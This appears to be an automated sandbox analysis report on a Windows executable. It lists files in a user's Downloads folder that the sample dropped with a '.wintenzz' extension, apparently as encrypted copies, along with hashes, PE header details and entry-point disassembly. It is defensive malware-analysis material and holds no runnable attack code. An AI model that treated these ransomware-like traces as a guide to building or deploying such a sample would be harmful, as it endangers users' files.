Preview:	................Y1l7I5R7VU0aEP52zeh1XVyb........z..q.........O..u..)......!5h..<IAU.B>......?=4.RT.u`..Y.b....msA..>Jz.>U0.$.1.'$]....$:.kE.m#.b.RT..(E=R...C7.........c...eE..8....cVi.!.{@k..#./...Z...&..0..0..j.1.$.. .Q$N..5V.\|.g.......f.....Uo..B...\R...z..y..vU.N...$...r5.).5..j....W.].....V.Fae...{@~...]{6...L....&v...P...n.Z..w+,F.....4...(.+ ...c..9...T..w.....w&6GW..(.Q......t.Y.f..........l%....Y..U.t...>>..8.?...D.....L6...[..p.k..q.f.K....G..X:K....t!..f<.l>?.1.P.r:5....I...$.....A..T..Y9O..-...ZN.rD...Jl...a..3...5.VN.uA....IY&..s.(.@A.8;...\2j^...O.... ..`...F6.(.dT......2..f...,m..`.._.{.....<...>@.6X..(l.t6.W.a\|w~.....D...S[...'.t...y..,G....7Z.........}%~.Tt...v;4......#8.C.....9l#%...><..`..r........R.5w*.8.B...u.G;...B..R.......6....A...lS....[...2$.8..b.nhJ...agyM..9%h$.......w..FM.)U.x.SA....o.dP...l<7d...$.[.R..6..........>.....r..j...gHcu.a.1g..)VntU....w...K.Ukm.......O....J.w0$...+i.IE..@..E...4.L.'76.R..w.....b{.J. >..$.....t.

C:\Users\user\Downloads\LHEPQPGEWF.xlsx Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.75246700404152
Encrypted:	false
SSDEEP:	24:gvSND8bWXKPPdblvsWuV3H1Ps/cX2++NN5+40WT+guAnWwFlU:uiKHHkWQ4JNiguAnl7U
MD5:	D3808011657D1B82E955A4330658A5C5
SHA1:	B222439DAF2BB62DA40D47204A19CE864DCB54E0
SHA-256:	931C1A47677CFB51A41C3FE8179824BE181756A854CBEB945B5C8202DC2CF3D4
SHA-512:	125820D5B46DFA8AB0DE88B0F660E437689419AA76C82D0EF4D619F89FEB1713F316DCB42EA81AD1381B955565C3673959F7B9AB66689AC9DEAD845503FE511F
Malicious:	false
Preview:	................XBMIEFojVYtTfogcrrxWVwS9........L.bp.N_..d.a.P.....w.0"..&.a<^...).C....k.V.aX.j.;..... e.C~...H....\4F..u.a._..S....]...~D...O..x....w4 .....;...@@....8....."...+=;./...J.I...8../F..4.WRt.j..U>...e...X.Zy.......Ij. .fw..JE1......y..n...t2.M.'......A...(.........".n..jt.S..o..vc..-...l...w....w..M.-D"8..G0.twu....... <........ G.F.s..`z.G.+..3.y.&..iN...~s.O..._.]...o.J.g.'MZ.....d]D.../.&...(.Lv....:.B9..........X.....l..C......o...s..Q.....@...?.X.n.^/}/..+M9Q. u.&.......AQ3....}.j..L...t..Z.L?2}%..=U.mD...nK.uR.....Fv....0..P..E.Ade^.P.>po..@/5:`V....I...1.\|%.kQo~ ~..n...T.b.`...u.ka1{......K..........L....\..#.ab..y..,.K5)d.'..eb........:...}.....s...d.2.+t.s.....*M.q.h.9..r$Zl....YS..@..Y.[..0.j....n(....._.J7Y....Y4m.7E+S...tI."..7.vQ.n&.5...1..y..x..8.=.Zu}....F....n.7c?....@........+..M..%.`.+._._Y.._I.".[.Z......b"V.(X..@.}..E....9...g.D...!...2.S.L..d......k8.8.)g....c;....e......{9.Y../.J?...W.T...\|.d2.B0...'?."....8.0

C:\Users\user\Downloads\LHEPQPGEWF.xlsx.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.75246700404152
Encrypted:	false
SSDEEP:	24:gvSND8bWXKPPdblvsWuV3H1Ps/cX2++NN5+40WT+guAnWwFlU:uiKHHkWQ4JNiguAnl7U
MD5:	D3808011657D1B82E955A4330658A5C5
SHA1:	B222439DAF2BB62DA40D47204A19CE864DCB54E0
SHA-256:	931C1A47677CFB51A41C3FE8179824BE181756A854CBEB945B5C8202DC2CF3D4
SHA-512:	125820D5B46DFA8AB0DE88B0F660E437689419AA76C82D0EF4D619F89FEB1713F316DCB42EA81AD1381B955565C3673959F7B9AB66689AC9DEAD845503FE511F
Malicious:	false
Preview:	................XBMIEFojVYtTfogcrrxWVwS9........L.bp.N_..d.a.P.....w.0"..&.a<^...).C....k.V.aX.j.;..... e.C~...H....\4F..u.a._..S....]...~D...O..x....w4 .....;...@@....8....."...+=;./...J.I...8../F..4.WRt.j..U>...e...X.Zy.......Ij. .fw..JE1......y..n...t2.M.'......A...(.........".n..jt.S..o..vc..-...l...w....w..M.-D"8..G0.twu....... <........ G.F.s..`z.G.+..3.y.&..iN...~s.O..._.]...o.J.g.'MZ.....d]D.../.&...(.Lv....:.B9..........X.....l..C......o...s..Q.....@...?.X.n.^/}/..+M9Q. u.&.......AQ3....}.j..L...t..Z.L?2}%..=U.mD...nK.uR.....Fv....0..P..E.Ade^.P.>po..@/5:`V....I...1.\|%.kQo~ ~..n...T.b.`...u.ka1{......K..........L....\..#.ab..y..,.K5)d.'..eb........:...}.....s...d.2.+t.s.....*M.q.h.9..r$Zl....YS..@..Y.[..0.j....n(....._.J7Y....Y4m.7E+S...tI."..7.vQ.n&.5...1..y..x..8.=.Zu}....F....n.7c?....@........+..M..%.`.+._._Y.._I.".[.Z......b"V.(X..@.}..E....9...g.D...!...2.S.L..d......k8.8.)g....c;....e......{9.Y../.J?...W.T...\|.d2.B0...'?."....8.0

C:\Users\user\Downloads\NIRMEKAMZH.jpg Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.782715288272959
Encrypted:	false
SSDEEP:	24:iCVoN3PIYlNS1DDE/t/rdUexbTNcgix4ixZTGkVhNGvrxZTdcj5w:iCa/JNS1DDYlhUehNcXHxZTRKdxH
MD5:	03B67609456BCBCB75832539FE8A3064
SHA1:	627EC732F671471DC9B25123C217CEECE359B7F7
SHA-256:	1CD1A7DB024FD663984AB91850FE1D4F482EFB6AB19604A18ED6F96B9E1AC57A
SHA-512:	D3AF85CE200F46DA00E9C5646612BD24A5997EBF87924CCA4A54F8684106AF8B4153200D49C6E89A72DBDE3B4D7982A36F0B8E8FFC0889ED991793C5C4D6DE21
Malicious:	false
Preview:	................1J7nuFPWrpNJGUJcLkhDsY91........P:......\|0.<......5.\|?.......\...0.ij......C.H..{;.c;....B...........7HW..:...so.K.f..7j.B.$..Zd.....OJ.6....R~(...}.0./d.w.1L.!N>Sa.T?......&...1..f....C.ju...O...C.....b.n.....c.'k!<....zs...o.<l..u..=.Ic..&....t.....K..??....W...3!1....;.g..S.2..`...gH3.C;..=QC..._c.....m)..3E.p..........>.<..t.d......z...X<..r...A.....~#...w".....D..O..3l...(....Ts.r1.....z1W.?4Vl.#....,/{w...!.Q.8...q.C...Y...,...N..Co".%M.. CHR.h..fH..t........Ha...Z....f..M..=......5..~...v....<F......]1Z.........{..(..4!...b.,/.~...W......t..u(..b..N...X.g.....5.......%~.\0..A....%.@.+..#G+}..p.....e...#.m@hTo".-...6..?R..#..(....D....W\|..U....x1.....!....Y.Y.>...<...}E.Pl~...l.<'.s-.......{?./cF.q....._{.exo.(..."b@F.>.o.[._....s..4.Q...c.<.......T\m.....7.....,.NC.S...uK.....fd0&...O..C/..N.....%].r.o....9...7...B,..?.2..".).(=n.\|.....r.i.E....Ln..."'qmx..P2....<.g..8...v7.R6..^89..BTe..Y....hu.-....Q.).....w(.m./..x.

C:\Users\user\Downloads\NIRMEKAMZH.jpg.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.782715288272959
Encrypted:	false
SSDEEP:	24:iCVoN3PIYlNS1DDE/t/rdUexbTNcgix4ixZTGkVhNGvrxZTdcj5w:iCa/JNS1DDYlhUehNcXHxZTRKdxH
MD5:	03B67609456BCBCB75832539FE8A3064
SHA1:	627EC732F671471DC9B25123C217CEECE359B7F7
SHA-256:	1CD1A7DB024FD663984AB91850FE1D4F482EFB6AB19604A18ED6F96B9E1AC57A
SHA-512:	D3AF85CE200F46DA00E9C5646612BD24A5997EBF87924CCA4A54F8684106AF8B4153200D49C6E89A72DBDE3B4D7982A36F0B8E8FFC0889ED991793C5C4D6DE21
Malicious:	false
Preview:	................1J7nuFPWrpNJGUJcLkhDsY91........P:......\|0.<......5.\|?.......\...0.ij......C.H..{;.c;....B...........7HW..:...so.K.f..7j.B.$..Zd.....OJ.6....R~(...}.0./d.w.1L.!N>Sa.T?......&...1..f....C.ju...O...C.....b.n.....c.'k!<....zs...o.<l..u..=.Ic..&....t.....K..??....W...3!1....;.g..S.2..`...gH3.C;..=QC..._c.....m)..3E.p..........>.<..t.d......z...X<..r...A.....~#...w".....D..O..3l...(....Ts.r1.....z1W.?4Vl.#....,/{w...!.Q.8...q.C...Y...,...N..Co".%M.. CHR.h..fH..t........Ha...Z....f..M..=......5..~...v....<F......]1Z.........{..(..4!...b.,/.~...W......t..u(..b..N...X.g.....5.......%~.\0..A....%.@.+..#G+}..p.....e...#.m@hTo".-...6..?R..#..(....D....W\|..U....x1.....!....Y.Y.>...<...}E.Pl~...l.<'.s-.......{?./cF.q....._{.exo.(..."b@F.>.o.[._....s..4.Q...c.<.......T\m.....7.....,.NC.S...uK.....fd0&...O..C/..N.....%].r.o....9...7...B,..?.2..".).(=n.\|.....r.i.E....Ln..."'qmx..P2....<.g..8...v7.R6..^89..BTe..Y....hu.-....Q.).....w(.m./..x.

C:\Users\user\Downloads\PWZOQIFCAN.png Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.780104751081916
Encrypted:	false
SSDEEP:	24:6Ne37q5AQNTmTAczD9VLNHQdBR5eX8UAem1+DeN4hIv+1I:CA7qDN6T5XT1QdBR5q2eg+DeN4em1I
MD5:	A336A3AF0BFF4E7D5E685104D2C6CA62
SHA1:	D5D854AA455138C7C02D78D6189BA6B7D4810148
SHA-256:	FD5D335E8684453864886791DF52718C1F23ED6854F9FAEDB03353D83D29C9CC
SHA-512:	24DDA1D1716D81A02154AF1A0EAC30774D9568768CF699C6FBABBF8696B0ED80384AC38DF8DF1D1B8654C8AFE9DE3319B2370E104EC9112DCCBD24B854A956B7
Malicious:	false
Preview:	................1uEYQIRFbawo5rB3HX7cuju5..........@R.ip..."/.V...K7...a.gw...q..@..vsG.....8...../Y. JFd.....Ds.J...KM.._.....c..\|f..1..\|'..q..{.,.0,....\.34.hCSTcV.-......9...}.n.....W.~..........n.......R.M....Mq..md.w.F.?..Iv....G.b.#....ZL.le....}<...Qz..@.c./r..>x a.].q..\.oY...w3...O.DR.eh.E9...;i..+...K._...[E..>....d.t\|..j...V..y...5#.......u.."..j.G.e@....d.>e.`..........{)...`.....W.HN.H...'....l..=..-.n..J.rkMb.A8g.>&M\./.G..X..m..~.cF...+.....Z...He....xN.... .~z...\|XI..{C.)m...:q......10y!...VJ...RS..Fx.e.A..O..J5...!RP.a..-...S.>.JR.I.5..\....8...b........a..i}.@x.%.........!..[UvKyv.$(D^'V2..=.L..4`.z..1...9..49iKC...4#..}a"..Mw=Q.H.zb...i\|......Y9;&..\.............V..... .V..b.....#.......J....&}..e...GW..yq./....m0_\|._.5..W:..:.+C.,.W.`T..A.Mo.7....}Iv...2R.`.%.>XL.J.c..M@.2.!..l......LN......O.R.y?0Rvj.V..g...... ...3x....k.._...-..Hb.X>....6;.<i Sr4[p..m.....y.,.N..Lzb!..9...u +..[.;.4..Y.i.Q....+.......Ckw....@."

C:\Users\user\Downloads\PWZOQIFCAN.png.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.780104751081916
Encrypted:	false
SSDEEP:	24:6Ne37q5AQNTmTAczD9VLNHQdBR5eX8UAem1+DeN4hIv+1I:CA7qDN6T5XT1QdBR5q2eg+DeN4em1I
MD5:	A336A3AF0BFF4E7D5E685104D2C6CA62
SHA1:	D5D854AA455138C7C02D78D6189BA6B7D4810148
SHA-256:	FD5D335E8684453864886791DF52718C1F23ED6854F9FAEDB03353D83D29C9CC
SHA-512:	24DDA1D1716D81A02154AF1A0EAC30774D9568768CF699C6FBABBF8696B0ED80384AC38DF8DF1D1B8654C8AFE9DE3319B2370E104EC9112DCCBD24B854A956B7
Malicious:	false
Preview:	................1uEYQIRFbawo5rB3HX7cuju5..........@R.ip..."/.V...K7...a.gw...q..@..vsG.....8...../Y. JFd.....Ds.J...KM.._.....c..\|f..1..\|'..q..{.,.0,....\.34.hCSTcV.-......9...}.n.....W.~..........n.......R.M....Mq..md.w.F.?..Iv....G.b.#....ZL.le....}<...Qz..@.c./r..>x a.].q..\.oY...w3...O.DR.eh.E9...;i..+...K._...[E..>....d.t\|..j...V..y...5#.......u.."..j.G.e@....d.>e.`..........{)...`.....W.HN.H...'....l..=..-.n..J.rkMb.A8g.>&M\./.G..X..m..~.cF...+.....Z...He....xN.... .~z...\|XI..{C.)m...:q......10y!...VJ...RS..Fx.e.A..O..J5...!RP.a..-...S.>.JR.I.5..\....8...b........a..i}.@x.%.........!..[UvKyv.$(D^'V2..=.L..4`.z..1...9..49iKC...4#..}a"..Mw=Q.H.zb...i\|......Y9;&..\.............V..... .V..b.....#.......J....&}..e...GW..yq./....m0_\|._.5..W:..:.+C.,.W.`T..A.Mo.7....}Iv...2R.`.%.>XL.J.c..M@.2.!..l......LN......O.R.y?0Rvj.V..g...... ...3x....k.._...-..Hb.X>....6;.<i Sr4[p..m.....y.,.N..Lzb!..9...u +..[.;.4..Y.i.Q....+.......Ckw....@."

C:\Users\user\Downloads\PWZOQIFCAN.xlsx Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.799193742475566
Encrypted:	false
SSDEEP:	24:swPwh42atSvq3J9zuLimmZ+ZIPSF4qWt2Dcdz9gS//I:twh4rfuGn+eq4qRQeSY
MD5:	E366E3467A3DF793AFAA1D689CB14D71
SHA1:	AD78C2B360C6848DCFD0B2B74A6D8EC43738F763
SHA-256:	057AF5590B122BD7B4730DDC141A21B5D6E365269C357E8CD93BDA19AFBFF4AA
SHA-512:	77B55DF7C56CBDC464FBF8EC17DC3B423F7197E2D80FAF41E98A4BF371C7AE8C08AB5F3342D3B8B3BE72273268B0E64BCC323683E778757AC184AECBFA1F66F6
Malicious:	false
Preview:	................eYiM3XhJ0xuKvt3aypBwGeGE........t.N.n...B.^......@.4..x.B..yh........7..A]..C..Q.eC~.8.IY._.q.(.dqRT...x.tN.........l.y;..3o.;,.i..h.*....y.../.?.......y.....t.\|;4..!@.Q1H.$.7.pT..KHg@La.-.7...........A.Y.[....[PH...B..M...;...)....5p...}XX5....p.}<SU%5.d%..vlx.Q..&~BJ(..."......x.G.<B....tk...&..ED.....;"}.5.r..o....4......^...'....O.PmB#..(.Qq..f..4.C$.....\|..j.#..q.A.Y....p.a~+%...\|.G.........f2..1e...iP..7.WF..S......R...$Q.:.C.,n../i..H...vs.Ia....T5O..G..q.....i..../..BI....._...(.fP..B\|d}...k.... 7.."...g2.3.X[....KVL.%...k.o.r..m_C.........X....g.j...E. .$..wW.]#q0..~....eqY..n..=^.5...>%z.q.i..G.....ya.-...N.`....%/.....E...0...K..3...m..FwQi(....2...XF....r..q....c.)....Jf .g...;2.T2......H....m../..."..2..{c..<.....z][..Rs<.6..P\7.....Y}.fV..@..Z.a..B@N.eLj.^.......;...2!.B..=pg.....x......b...^....GdF....B....s..>a.^.....'.R.=E...m.y#.Y..C....2....3..b.......M.W../.'-..?...a.....h...Y..+lly.g....zU...W{..

C:\Users\user\Downloads\PWZOQIFCAN.xlsx.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.799193742475566
Encrypted:	false
SSDEEP:	24:swPwh42atSvq3J9zuLimmZ+ZIPSF4qWt2Dcdz9gS//I:twh4rfuGn+eq4qRQeSY
MD5:	E366E3467A3DF793AFAA1D689CB14D71
SHA1:	AD78C2B360C6848DCFD0B2B74A6D8EC43738F763
SHA-256:	057AF5590B122BD7B4730DDC141A21B5D6E365269C357E8CD93BDA19AFBFF4AA
SHA-512:	77B55DF7C56CBDC464FBF8EC17DC3B423F7197E2D80FAF41E98A4BF371C7AE8C08AB5F3342D3B8B3BE72273268B0E64BCC323683E778757AC184AECBFA1F66F6
Malicious:	false
Preview:	................eYiM3XhJ0xuKvt3aypBwGeGE........t.N.n...B.^......@.4..x.B..yh........7..A]..C..Q.eC~.8.IY._.q.(.dqRT...x.tN.........l.y;..3o.;,.i..h.*....y.../.?.......y.....t.\|;4..!@.Q1H.$.7.pT..KHg@La.-.7...........A.Y.[....[PH...B..M...;...)....5p...}XX5....p.}<SU%5.d%..vlx.Q..&~BJ(..."......x.G.<B....tk...&..ED.....;"}.5.r..o....4......^...'....O.PmB#..(.Qq..f..4.C$.....\|..j.#..q.A.Y....p.a~+%...\|.G.........f2..1e...iP..7.WF..S......R...$Q.:.C.,n../i..H...vs.Ia....T5O..G..q.....i..../..BI....._...(.fP..B\|d}...k.... 7.."...g2.3.X[....KVL.%...k.o.r..m_C.........X....g.j...E. .$..wW.]#q0..~....eqY..n..=^.5...>%z.q.i..G.....ya.-...N.`....%/.....E...0...K..3...m..FwQi(....2...XF....r..q....c.)....Jf .g...;2.T2......H....m../..."..2..{c..<.....z][..Rs<.6..P\7.....Y}.fV..@..Z.a..B@N.eLj.^.......;...2!.B..=pg.....x......b...^....GdF....B....s..>a.^.....'.R.=E...m.y#.Y..C....2....3..b.......M.W../.'-..?...a.....h...Y..+lly.g....zU...W{..

C:\Users\user\Downloads\UBVUNTSCZJ.png Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.802356306594139
Encrypted:	false
SSDEEP:	24:ob/md8CJpuixCdYWevsOvTc4zgP0lxIEqvPU6LepU74tXliCK8:ob/YZOiWqsCTc4zw0450SebtVlK8
MD5:	765B4E087E2084CA174633D856927A1C
SHA1:	3B27F1E7C99BDE9B1539D74C24263FE699072172
SHA-256:	36ED78D96C1A5BDF7D769862D1350989B16A8307468EF4DE17A49CAF7F3BD13C
SHA-512:	FE0E1959FAC73C9EFFC55C5E42DDE08399E957EC71A9951135515D3E4915B42D9E5BB5B464A76FA668A558C1686C5CD501A1DF0B8BC422AD6FA575DA4B02C27B
Malicious:	false
Preview:	................BzQIIyimg6bv2Va1DJ0k1plD........Q;.f}..2..#.?..D......z.3q:3.4.s........5...T....#T......<..&..O.3....?.a..0..$...o..E....cR,..%(..W.Y..(.1.QHop.....L8..k..b...1..Wj.LJ/4s........\|u...%..F;.......5.pc.`k......!k..2......oiD..o~.pL.L..RF......@..:^.......<.9....C.s...r.._2.x.>.,..^.::....1."b..8;..dy`...."....s..{Uf7...T)...o.)...GQb..........?ez.Ut.,....[^..y.$SC.Mw.4<...g ..%{&.c.......J{..>k...?......3.p....:3.D$.V.8.y.X.x..`.2.....;.d$........e.}..I..H.@.....:...$......L7..D...m...}6_.\...-\|.....`..:...G....!..6...[Z...............<]...HUxWI......~6.e.Ae...u.........s.9..h..^.F.a_A\|o... p..T..m.U.....u.....V.J...U.X.^!.^..R..s'..lC..........r..8.U....m..."qm+5..(.....`..(.b`.d.....{.UP..T.;..~.......i....nf@.JV.x.....18.J_../.._z.\.[U4x...Yl.......A...H.....m.....#.u.ZP.O.-..Z4*..'.X.)B....s#.a.3.f..P......g...{.v.....^.@..AUc.....3.=....-0...]..@M......}Snc..F..1}.....~>...+.-.....k.,....}.$./.......Q./.#$.....5....s

C:\Users\user\Downloads\UBVUNTSCZJ.png.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.802356306594139
Encrypted:	false
SSDEEP:	24:ob/md8CJpuixCdYWevsOvTc4zgP0lxIEqvPU6LepU74tXliCK8:ob/YZOiWqsCTc4zw0450SebtVlK8
MD5:	765B4E087E2084CA174633D856927A1C
SHA1:	3B27F1E7C99BDE9B1539D74C24263FE699072172
SHA-256:	36ED78D96C1A5BDF7D769862D1350989B16A8307468EF4DE17A49CAF7F3BD13C
SHA-512:	FE0E1959FAC73C9EFFC55C5E42DDE08399E957EC71A9951135515D3E4915B42D9E5BB5B464A76FA668A558C1686C5CD501A1DF0B8BC422AD6FA575DA4B02C27B
Malicious:	false
Preview:	................BzQIIyimg6bv2Va1DJ0k1plD........Q;.f}..2..#.?..D......z.3q:3.4.s........5...T....#T......<..&..O.3....?.a..0..$...o..E....cR,..%(..W.Y..(.1.QHop.....L8..k..b...1..Wj.LJ/4s........\|u...%..F;.......5.pc.`k......!k..2......oiD..o~.pL.L..RF......@..:^.......<.9....C.s...r.._2.x.>.,..^.::....1."b..8;..dy`...."....s..{Uf7...T)...o.)...GQb..........?ez.Ut.,....[^..y.$SC.Mw.4<...g ..%{&.c.......J{..>k...?......3.p....:3.D$.V.8.y.X.x..`.2.....;.d$........e.}..I..H.@.....:...$......L7..D...m...}6_.\...-\|.....`..:...G....!..6...[Z...............<]...HUxWI......~6.e.Ae...u.........s.9..h..^.F.a_A\|o... p..T..m.U.....u.....V.J...U.X.^!.^..R..s'..lC..........r..8.U....m..."qm+5..(.....`..(.b`.d.....{.UP..T.;..~.......i....nf@.JV.x.....18.J_../.._z.\.[U4x...Yl.......A...H.....m.....#.u.ZP.O.-..Z4*..'.X.)B....s#.a.3.f..P......g...{.v.....^.@..AUc.....3.=....-0...]..@M......}Snc..F..1}.....~>...+.-.....k.,....}.$./.......Q./.#$.....5....s

C:\Users\user\Downloads\WHZAGPPPLA.mp3 Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.796066237673871
Encrypted:	false
SSDEEP:	24:n1nKnG7kStxiyH/HeJl+E/dBQuyasVIfL1LY+T/juDXwp:1nD7kLocfHQ7VYL1Lvu7wp
MD5:	A272E13455CA9A71C970C1E3840C1598
SHA1:	1375873383C2B450CBFDE6A32654A8CF021885FA
SHA-256:	D163E87156F8CD3A8F332A5A0190940A539612212927F5CB13BD39B3E74DB8B4
SHA-512:	72F20509AE9BC4C3134F98FA0B1C66F67BD47B59FD85CDB998EB22D2AE344E7CB7B4ED3F179BC9A11EBE556EBF922F68EEDEF25EC29C8796236A58A15D6C7B11
Malicious:	false
Preview:	................eGx9DD013rFLjL0lHuQss7CQ........o.........L..F+........u....[..Z..........uN...7....g:'..);..x.%[.J)Z...t.B...U...X$o.9...Z..<..Z.s..=se.]xrB.:.b..J.Q..GW.>.J..2DY.!_...Q.g......p.<gn/..e....3..9...0.8g.rm......4....w....V.p6p....)... ....oy.y...Y..j.%."......q\<.2y..2..=.WP....-[d.=....92.NA.B_...a).d..R.8....o.....i..hz..gu......Pc.0`..X..-..op^...v^.zZ..]..k.l.6.J...Pb.@[D.f.X....q........!...Y.\|.g.N.'}..x.".....(....S..,=4&..hg.e&3..Q.c(\K.....P..M... .f.\.K.7VQ.z...9.k%..,{2!.;..X...\|........^rz.{.........W......Wa.,....O..6ZM.e..a.u.-.tT.....D..7...../...p=..`..f.M<8..d<@.4ZM4.........8.o..^sKC]...}.]..f.....!..9Y++..e..Y.N.n./.i...o`....)......$..E..%...v.c<...d.09..\?9n...Z.Fb..d.}.^.x."4....!.Xd.....C..J.<0o..{...`DP.DG..../1...w2...<"EG............[..f.Du......_.....aB..{...Cz.}..Zp.).r .........$h..o.....3...}..-..m...`AED...(y......$.P..t.\| ...1f3._.T....4.t.q......P.;...?...._"..z.U>...`%...{....W0._<M.n.

C:\Users\user\Downloads\WHZAGPPPLA.mp3.wintenzz Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.796066237673871
Encrypted:	false
SSDEEP:	24:n1nKnG7kStxiyH/HeJl+E/dBQuyasVIfL1LY+T/juDXwp:1nD7kLocfHQ7VYL1Lvu7wp
MD5:	A272E13455CA9A71C970C1E3840C1598
SHA1:	1375873383C2B450CBFDE6A32654A8CF021885FA
SHA-256:	D163E87156F8CD3A8F332A5A0190940A539612212927F5CB13BD39B3E74DB8B4
SHA-512:	72F20509AE9BC4C3134F98FA0B1C66F67BD47B59FD85CDB998EB22D2AE344E7CB7B4ED3F179BC9A11EBE556EBF922F68EEDEF25EC29C8796236A58A15D6C7B11
Malicious:	false
Preview:	................eGx9DD013rFLjL0lHuQss7CQ........o.........L..F+........u....[..Z..........uN...7....g:'..);..x.%[.J)Z...t.B...U...X$o.9...Z..<..Z.s..=se.]xrB.:.b..J.Q..GW.>.J..2DY.!_...Q.g......p.<gn/..e....3..9...0.8g.rm......4....w....V.p6p....)... ....oy.y...Y..j.%."......q\<.2y..2..=.WP....-[d.=....92.NA.B_...a).d..R.8....o.....i..hz..gu......Pc.0`..X..-..op^...v^.zZ..]..k.l.6.J...Pb.@[D.f.X....q........!...Y.\|.g.N.'}..x.".....(....S..,=4&..hg.e&3..Q.c(\K.....P..M... .f.\.K.7VQ.z...9.k%..,{2!.;..X...\|........^rz.{.........W......Wa.,....O..6ZM.e..a.u.-.tT.....D..7...../...p=..`..f.M<8..d<@.4ZM4.........8.o..^sKC]...}.]..f.....!..9Y++..e..Y.N.n./.i...o`....)......$..E..%...v.c<...d.09..\?9n...Z.Fb..d.}.^.x."4....!.Xd.....C..J.<0o..{...`DP.DG..../1...w2...<"EG............[..f.Du......_.....aB..{...Cz.}..Zp.).r .........$h..o.....3...}..-..m...`AED...(y......$.P..t.\| ...1f3._.T....4.t.q......P.;...?...._"..z.U>...`%...{....W0._<M.n.

Static File Info

General
File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.475137463880299
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	IJht2pqbVh.exe
File size:	941568
MD5:	2716659c3b1e8927dcb2e418e99b1ea5
SHA1:	0428a2ead08f005f3c90a493e10207322d8a429b
SHA256:	1ba9ef8703b10a0f158636a138b120835e9588c21ec2e78be898afcae54b0142
SHA512:	db25a1d046f6e83b3d7ba1d6205b04de6f74581837f0d293f6f9983975c8bad2b8cc53e956454ab8528f3350bba3abe04032c3b6b1c1a0c0c844d40f9b957b64
SSDEEP:	12288:6Bqk8tIzpnRc3hg098BDtcQxFVx2DyxLbWURXwNi5DHkJ9TbJtJ:6BHr8D90DtBFVxYILbbRXwNz/Tbl
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f..."..."..."...+.b.6....... ....[6.%.......5.......(.......&...y...3..."...3.......m.......&..."...........#...Rich"..........

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x1400b1028
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Time Stamp:	0x605EBEA9 [Sat Mar 27 05:12:09 2021 UTC]
TLS Callbacks:	0x4005cda0, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	d15f30a012d1f18a10b3b2009ac828a9

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F1DA882A174h
dec eax
add esp, 28h
jmp 00007F1DA8829997h
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
lea eax, dword ptr [00017DD7h]
dec eax
mov ebx, ecx
dec eax
mov dword ptr [ecx], eax
test dl, 00000001h
je 00007F1DA8829B2Ch
mov edx, 00000018h
call 00007F1DA882A4E3h
dec eax
mov eax, ebx
dec eax
add esp, 20h
pop ebx
ret
int3
dec eax
sub esp, 28h
dec ebp
mov eax, dword ptr [ecx+38h]
dec eax
mov ecx, edx
dec ecx
mov edx, ecx
call 00007F1DA8829B32h
mov eax, 00000001h
dec eax
add esp, 28h
ret
int3
int3
int3
inc eax
push ebx
inc ebp
mov ebx, dword ptr [eax]
dec eax
mov ebx, edx
inc ecx
and ebx, FFFFFFF8h
dec esp
mov ecx, ecx
inc ecx
test byte ptr [eax], 00000004h
dec esp
mov edx, ecx
je 00007F1DA8829B35h
inc ecx
mov eax, dword ptr [eax+08h]
dec ebp
arpl word ptr [eax+04h], dx
neg eax
dec esp
add edx, ecx
dec eax
arpl ax, cx
dec esp
and edx, ecx
dec ecx
arpl bx, ax
dec edx
mov edx, dword ptr [eax+edx]
dec eax
mov eax, dword ptr [ebx+10h]
mov ecx, dword ptr [eax+08h]
dec eax
mov eax, dword ptr [ebx+08h]
test byte ptr [ecx+eax+03h], 0000000Fh
je 00007F1DA8829B2Dh
movzx eax, byte ptr [ecx+eax+03h]
and eax, FFFFFFF0h
dec esp
add ecx, eax
dec esp
xor ecx, edx
dec ecx
mov ecx, ecx
pop ebx
jmp 00007F1DA8829B42h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
